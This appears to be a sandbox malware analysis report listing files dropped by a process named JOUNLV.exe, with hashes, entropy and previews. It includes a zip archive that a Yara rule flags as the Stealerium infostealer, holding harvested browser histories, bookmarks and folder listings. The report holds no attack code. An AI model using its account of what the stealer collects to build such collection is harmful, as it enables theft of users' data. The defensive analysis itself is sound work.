                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\tmpDCFB.tmp.dat

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5242880
                                                                                                                                                                                                                                                          Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                                          MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                                          SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                                          SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                                          SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\tmpEFE0.tmp.dat

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\tmpF000.tmp.dat

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\tmpF011.tmp.dat

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):159744
                                                                                                                                                                                                                                                          Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                          MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                          SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                          SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                          SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\tmpF031.tmp.dat

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):159744
                                                                                                                                                                                                                                                          Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                          MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                          SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                          SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                          SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH.zip

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):121765
                                                                                                                                                                                                                                                          Entropy (8bit):7.940296951911145
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:S1AkejYEV4kluY48xWOiEJnDod9mLV5aiiBmwc65T:MezVLJx/JsrmnP6l
                                                                                                                                                                                                                                                          MD5:32A27034121055815BAC17AEF7FFE522
                                                                                                                                                                                                                                                          SHA1:D6D2740A80E937A2AE731EAA1EE31A9E179AC4E3
                                                                                                                                                                                                                                                          SHA-256:C00F72C224620264D2C307E886F21C0EEC6B474E27427B93363E92F659D25369
                                                                                                                                                                                                                                                          SHA-512:A7209FE1D6F5E990CAEFEB3BC2DE28013BD3EF619FD2075C44D78FF92E7D039845BB72B64FD2BBF1D59E6EC5B46050FFE8F44BAFB9A10AF1F2E058DC7804A46A
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH.zip, Author: Joe Security
                                                                                                                                                                                                                                                          Preview:PK........''}Y................Browsers/Edge/History.txt....+.C.(PK........''}Yq.C]t...........Browsers/Firefox/Bookmarks.txtU..0J..6..h..../....Z2T..d..B......c20.,.;.-..Q....o...|.....P..%..&.z.....R.9&.7w{mzUj. @..!......z....T.R....PK..q.C]t.......PK........''}Y...sl...^.......Browsers/Firefox/History.txt...={2.O...4.S.Zzb..xC^..b..r)Z....a..y.T.....g.X.a...?@\.y.1(..i.B6G.....jL..e....u....L.if......w..-...#PK.....sl...^...PK........''}Y................Browsers/Google/Downloads.txt..]d...68t.3PK........''}Y................Browsers/Google/History.txt......X....PK........&'}Y.y.....5.......Directories/Desktop.txt.hrD....b.[....A.........:...a...qOO....~.#P..S/G...../.~g.......3h.?F.Ki.K.CC. [..\......m-.N.M.......D.9k..d;..M..{..Y.. ..........._q7o]....M.\.....OE...GGxD{W.;...?.....P`.%.....g.W....G...+r.y`..(F....=JU..=5...w..K........aB.'5...v.A..uO.zVoPK...y.....5...PK........''}Y....(...........Directories/Documents.txt5$E...'..p.%.6w.{S.0y...B.mp...`..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Browsers\Firefox\Bookmarks.txt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):220
                                                                                                                                                                                                                                                          Entropy (8bit):4.546534105739819
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:Kw5FBeKjMnf3eKj5ZKMeKjYLC/eKjtyRE2YReK3:KCBH4n/HHKMHsL0HMRE2uH3
                                                                                                                                                                                                                                                          MD5:2AB1FD921B6C195114E506007BA9FE05
                                                                                                                                                                                                                                                          SHA1:90033C6EE56461CA959482C9692CF6CFB6C5C6AF
                                                                                                                                                                                                                                                          SHA-256:C79CFDD6D0757EB52FBB021E7F0DA1A2A8F1DD81DCD3A4E62239778545A09ECC
                                                                                                                                                                                                                                                          SHA-512:4F0570D7C7762ECB4DCF3171AE67DA3C56AA044419695E5A05F318E550F1A910A616F5691B15ABFE831B654718EC97A534914BD172AA7A963609EBD8E1FAE0A5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Title: Get Help.URL: (No URL provided)..Title: Customize Firefox.URL: (No URL provided)..Title: Get Involved.URL: (No URL provided)..Title: About Us.URL: (No URL provided)..Title: Getting Started.URL: (No URL provided)..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Browsers\Firefox\History.txt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):94
                                                                                                                                                                                                                                                          Entropy (8bit):4.890995272476094
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:qtNRROrSLvIJiMhKVX3L2WdXOfZiGPHA9lfMJJEv:MeGLciA8dXwZiG/CF0Ev
                                                                                                                                                                                                                                                          MD5:A72509876646BC379E1D8C3B895ED0ED
                                                                                                                                                                                                                                                          SHA1:2F270C6A8E07FA7FEE8C07A1FD100474A9A513A8
                                                                                                                                                                                                                                                          SHA-256:8BF712CABAC55E09FF74348817A29572826688AE4AB516848FE882BC5DEF91E7
                                                                                                                                                                                                                                                          SHA-512:FDCB7BB82C0AF434610311D7B12EB2D6AEF7ADB8B040EBA97D3F115C18810799EEDC02B39AF6992C15552568B5BC799889CC185191D5E783DEB82DC98946A5EB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:URL: https://www.mozilla.org/en-US/privacy/firefox/.Title: Firefox Privacy Notice . Mozilla.

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Browsers\Google\History.txt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):244
                                                                                                                                                                                                                                                          Entropy (8bit):5.087743120757909
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:Uqf7R5WzLVMz3eYeDPO+YtnJXQcOG4E2WzLVMz3eYeDPOCd4:UO2zGjeDDPOtnKcOHPWzGjeDDPO7
                                                                                                                                                                                                                                                          MD5:4C0A246FFF442FDA266D22D0038B1D16
                                                                                                                                                                                                                                                          SHA1:9EC99F882E0D4B9B9305AADBA1875F88CF7A740D
                                                                                                                                                                                                                                                          SHA-256:44F3AB1DC0DC9397D7CE58C447533146360F68AFD3114D22AAE5056B10EC0E24
                                                                                                                                                                                                                                                          SHA-512:6E1C3DB12EBAA416448581C24D7FB1DD7F34BBD1FB40E8657B8A8FEBA9653E99BCD31B599DC7CA52E31C5560ECEA8E40B73C7E6DE1362AFF459E59F5B18B6D8D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:URL: Examples of Office product keys - Microsoft Support.Title: https://go.microsoft.com/fwlink/?linkid=851546..URL: Install the English Language Pack for 32-bit Office - Microsoft Support.Title: https://go.microsoft.com/fwlink/?LinkId=2106243.

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Directories\Desktop.txt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):565
                                                                                                                                                                                                                                                          Entropy (8bit):5.23585507185432
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:wvZ4gosmIcK7CNyhwNKVr8veeL7NUx7jWzoNaL78LKdPh9ZdndCkjDbxOeKFn:NgoRIckCiU7ux7jWz57rdPh9ZddCkjDo
                                                                                                                                                                                                                                                          MD5:43DC07E690B3AF6C26C7930D5347CB44
                                                                                                                                                                                                                                                          SHA1:07CABD6E9BF32D1BF2408AC97BB334F78E780FDD
                                                                                                                                                                                                                                                          SHA-256:902BB4ADAFED1F6542090A41FDE48578A2535EA7F98FBB0A74D470242ABCA77A
                                                                                                                                                                                                                                                          SHA-512:EAAFDC330723F8DB436558D740802F607DD70EA173120C238D3B7EBB61976CAF4430D1C88E23ADC9D0F1F863E4E7CB320C9222DE9B9FFFEA0C79276564491ED5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Desktop\...BPMLNOBVSB\...MXPXCVPDVN\...RAYHIWGKDI\...SQRKHNBNYN\...WUTJSCBCFX\....JSDNGYCOWY.jpg....KZWFNRXYKI.pdf....NIKHQAIQAU.mp3....WUTJSCBCFX.docx....YPSIACHYXW.xlsx....ZBEDCJPBEY.png...YPSIACHYXW\....CURQNKVOIX.png....JSDNGYCOWY.xlsx....NIKHQAIQAU.pdf....RAYHIWGKDI.jpg....YPSIACHYXW.docx....ZTGJILHXQB.mp3...CURQNKVOIX.png...desktop.ini...Excel.lnk...JSDNGYCOWY.jpg...JSDNGYCOWY.xlsx...KZWFNRXYKI.pdf...LKxcbzlwkz.exe...NIKHQAIQAU.mp3...NIKHQAIQAU.pdf...RAYHIWGKDI.jpg...WUTJSCBCFX.docx...YPSIACHYXW.docx...YPSIACHYXW.xlsx...ZBEDCJPBEY.png...ZTGJILHXQB.mp3..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Directories\Documents.txt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):690
                                                                                                                                                                                                                                                          Entropy (8bit):5.341619461426153
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:a4gosRPLKQ4wRLKTLKBLKMkLKTIcK7CNyhwNKVr8veeL7NUx7jWzoNaL78LKL9Z+:PgoJxrqEETIckCiU7ux7jWz57rL9ZdXA
                                                                                                                                                                                                                                                          MD5:09CE22A7968658943D601414355E5D70
                                                                                                                                                                                                                                                          SHA1:18C6E4A4076694B03561AFA3B50E9BF71D7F3D6A
                                                                                                                                                                                                                                                          SHA-256:8CF540C13811379E991CEFBC98A144ECB96F77B55640C8118D9F796E37B26AEF
                                                                                                                                                                                                                                                          SHA-512:632E7CB2B89EAE05D57FAD5A1308A365215587822733B3649821654EFF55057686DEAF5CE952E5A7EE0EEAA75C128472CE575AA93D1A4C6FB35D1AF736F370AA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Documents\...BPMLNOBVSB\...MXPXCVPDVN\...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....Saved Pictures\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...RAYHIWGKDI\...SQRKHNBNYN\...WUTJSCBCFX\....JSDNGYCOWY.jpg....KZWFNRXYKI.pdf....NIKHQAIQAU.mp3....WUTJSCBCFX.docx....YPSIACHYXW.xlsx....ZBEDCJPBEY.png...YPSIACHYXW\....CURQNKVOIX.png....JSDNGYCOWY.xlsx....NIKHQAIQAU.pdf....RAYHIWGKDI.jpg....YPSIACHYXW.docx....ZTGJILHXQB.mp3...CURQNKVOIX.png...desktop.ini...JSDNGYCOWY.jpg...JSDNGYCOWY.xlsx...KZWFNRXYKI.pdf...NIKHQAIQAU.mp3...NIKHQAIQAU.pdf...RAYHIWGKDI.jpg...WUTJSCBCFX.docx...YPSIACHYXW.docx...YPSIACHYXW.xlsx...ZBEDCJPBEY.png...ZTGJILHXQB.mp3..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Directories\Downloads.txt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):234
                                                                                                                                                                                                                                                          Entropy (8bit):5.23985794838707
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:3tkZL78LKKa9cadRdsd+eydsd+X/UobxudNrsNKL4kiBq:uZL78LKL9ZdXCkjDbxOeKFn
                                                                                                                                                                                                                                                          MD5:F0A648B2A721F1D4D9484A927FB5855C
                                                                                                                                                                                                                                                          SHA1:C7A5B28E6519E150CC5EE03B33B8ADF4D0FC39CA
                                                                                                                                                                                                                                                          SHA-256:0FB5F3705E2BFB07702C21504BBC2669F295E815F71636281B97607944659A8D
                                                                                                                                                                                                                                                          SHA-512:5F58C1DFF4CB7F51AD3F5C933516E446C21B86E834AAD11D2B7D84DF2B8D875D5F2FA09209C63A426A5304A9ABCD957F8690C8046856FEACA6F18859059D6BBB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Downloads\...CURQNKVOIX.png...desktop.ini...JSDNGYCOWY.jpg...JSDNGYCOWY.xlsx...KZWFNRXYKI.pdf...NIKHQAIQAU.mp3...NIKHQAIQAU.pdf...RAYHIWGKDI.jpg...WUTJSCBCFX.docx...YPSIACHYXW.docx...YPSIACHYXW.xlsx...ZBEDCJPBEY.png...ZTGJILHXQB.mp3..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Directories\OneDrive.txt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):25
                                                                                                                                                                                                                                                          Entropy (8bit):4.023465189601646
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:1hiR8LKB:14R8LKB
                                                                                                                                                                                                                                                          MD5:966247EB3EE749E21597D73C4176BD52
                                                                                                                                                                                                                                                          SHA1:1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
                                                                                                                                                                                                                                                          SHA-256:8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
                                                                                                                                                                                                                                                          SHA-512:BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:OneDrive\...desktop.ini..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Directories\Pictures.txt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):88
                                                                                                                                                                                                                                                          Entropy (8bit):4.450045114302317
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
                                                                                                                                                                                                                                                          MD5:D430E8A326E3D75F5E49C40C111646E7
                                                                                                                                                                                                                                                          SHA1:D8F2494185D04AB9954CD78268E65410768F6226
                                                                                                                                                                                                                                                          SHA-256:22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
                                                                                                                                                                                                                                                          SHA-512:1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Directories\Startup.txt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):24
                                                                                                                                                                                                                                                          Entropy (8bit):4.053508854797679
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:jgBLKB:j4LKB
                                                                                                                                                                                                                                                          MD5:68C93DA4981D591704CEA7B71CEBFB97
                                                                                                                                                                                                                                                          SHA1:FD0F8D97463CD33892CC828B4AD04E03FC014FA6
                                                                                                                                                                                                                                                          SHA-256:889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
                                                                                                                                                                                                                                                          SHA-512:63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Startup\...desktop.ini..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Directories\Temp.txt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3980
                                                                                                                                                                                                                                                          Entropy (8bit):5.348110083710864
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:4jzcRPTmt6qESf/gbQg3dxQ0rbiGVis9kovvbwq:BtbSXGQwrQCOKeiMq
                                                                                                                                                                                                                                                          MD5:AF22E406FF6E495019D00B360329781B
                                                                                                                                                                                                                                                          SHA1:7E92FAC664D8AF8435BE0D0E76CEEF1EC6D7300F
                                                                                                                                                                                                                                                          SHA-256:486464C343997C152DF30DCD1FB1EE0FE1DB888C93A46A5303C23521CC2F3E62
                                                                                                                                                                                                                                                          SHA-512:2D307D3ADEFFB7334E999D120889F9DA3FCD3889E712C2692D7FDD649029C2F9AF28EB8D3EBBC3BA53DDE74D5098C539062058968952A1846701574D55C8084E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-00-50-743.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-01-22-078.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696334775820156800_6EB929AF-656E-4F43-9731-EA7753E1F1BD.log.....App1696334923056622400_BD966DD2-7850-423A-B1D8-7882CE1A6D15.log.....App1696417072488237400_C12D9B44-3468-47BC-9418-BF0A674A2B2F.log.....App1696417101742322600_290EFEE9-C25A-4857-9F32-D7E6D51B7C09.log.....App1696417118050662300_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App1696417118051710600_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App_1696413198165042300_AA3FCB9C-CF1A-4407-8A94-A7D6C220021F.log...Low\...mozilla-temp-files\...Symbols\....ntkrnlmp.pdb\.....68A17FAF3012B7846079AEECDBE0A5831\......download.error......ntkrnlmp.pdb....winload

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Directories\Videos.txt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):23
                                                                                                                                                                                                                                                          Entropy (8bit):3.7950885863977324
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:k+JrLKB:k+JrLKB
                                                                                                                                                                                                                                                          MD5:1FDDBF1169B6C75898B86E7E24BC7C1F
                                                                                                                                                                                                                                                          SHA1:D2091060CB5191FF70EB99C0088C182E80C20F8C
                                                                                                                                                                                                                                                          SHA-256:A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
                                                                                                                                                                                                                                                          SHA-512:20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
                                                                                                                                                                                                                                                          Malicious:false
